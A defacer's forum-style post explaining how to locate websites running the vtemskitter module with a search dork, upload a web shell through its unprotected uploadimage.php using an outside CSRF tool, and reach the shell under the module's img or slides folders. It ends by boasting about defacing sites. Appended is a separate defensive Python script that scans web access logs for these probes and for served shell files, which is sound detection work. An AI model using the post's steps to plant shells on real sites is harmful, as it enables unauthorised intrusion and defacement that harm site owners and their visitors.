Dork: inurl:modules/vtemskitter/ (the dork can be developed further with your own imagination)
Exploit: /modules/vtemskitter/uploadimage.php
The online CSRF tool we use comes from Aweu404. Thanks, Aweu404.
https://www.my.aweu404.id/aw.php
Postname, fill in with: userfile
Shell access: site.co.li/modules/vtemskitter/img/urfile
or site.co.li/modules/vtemskitter/slides/urfile
Steps:
1. Dorking: search in images only.
2. Pick one of the images.
3. Enter the exploit above, like: site.co.li/[path]/modules/vtemskitter/uploadimage.php
4. Vulnerable? There is an error message in the corner.
5. Enter the vulnerable site into the CSRF tool and set Postname = userfile. When done, click Oke.
6. Upload your shell. When done, click jos.
7. To access the file, see above.
That's all. This post was put together just like this :V
Having Deface All defacer ^_^
Signed: Fix404
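A defender-side check for the activity this post describes, as an added example that is not part of the original post: it scans web access logs for requests to the module's uploadimage.php and for script files requested from the img/ and slides/ directories. The log lines are constructed samples; the combined log format and the list of executable extensions are assumptions.

```python
import re
from urllib.parse import unquote

# Constructed sample lines in combined log format (not real traffic).
SAMPLE_LOG = """\
203.0.113.7 - - [12/Mar/2024:10:01:02 +0000] "GET /modules/vtemskitter/uploadimage.php HTTP/1.1" 200 31 "-" "Mozilla/5.0"
203.0.113.7 - - [12/Mar/2024:10:01:40 +0000] "POST /shop/modules/vtemskitter/uploadimage.php HTTP/1.1" 200 12 "-" "Mozilla/5.0"
203.0.113.7 - - [12/Mar/2024:10:02:05 +0000] "GET /shop/modules/vtemskitter/img/x.php HTTP/1.1" 200 4821 "-" "Mozilla/5.0"
198.51.100.20 - - [12/Mar/2024:10:03:11 +0000] "GET /modules/vtemskitter/slides/banner1.jpg HTTP/1.1" 200 90211 "-" "Mozilla/5.0"
198.51.100.21 - - [12/Mar/2024:10:04:00 +0000] "GET /modules/vtemskitter/slides/a.PHP5?c=1 HTTP/1.1" 404 0 "-" "curl/8.0"
"""

LINE_RE = re.compile(r'^(\S+) \S+ \S+ \[([^\]]+)\] "(\S+) (\S+)[^"]*" (\d{3}) ')
# Uploader script and upload directories are the paths named in the post.
UPLOADER_RE = re.compile(r"/modules/vtemskitter/uploadimage\.php$", re.I)
# Assumed list of extensions a PHP-enabled server may execute; also matches
# double extensions such as name.php.jpg.
SCRIPT_RE = re.compile(
    r"/modules/vtemskitter/(?:img|slides)/[^/]*\.(?:php\d?|phtml|phar)(?:\.[^/]*)?$",
    re.I,
)


def classify(line):
    """Return a finding dict for a suspicious log line, else None."""
    m = LINE_RE.match(line)
    if not m:
        return None
    ip, ts, method, target, status = m.groups()
    path = unquote(target.split("?", 1)[0])  # drop query string, decode %xx
    if UPLOADER_RE.search(path):
        kind = "upload-attempt" if method == "POST" else "uploader-probe"
    elif SCRIPT_RE.search(path):
        # Status 200 means the server served (and possibly executed) the file.
        kind = "script-served" if status == "200" else "script-not-served"
    else:
        return None
    return {"ip": ip, "time": ts, "kind": kind, "path": path, "status": status}


def scan(log_text):
    """Classify every line and keep only the findings."""
    return [f for f in map(classify, log_text.splitlines()) if f]


if __name__ == "__main__":
    for f in scan(SAMPLE_LOG):
        print(f"{f['time']} {f['ip']} {f['kind']:<18} {f['status']} {f['path']}")
```

A `script-served` finding is the one to act on first: it means a script file under img/ or slides/ was returned with status 200, so those directories should be inspected on disk.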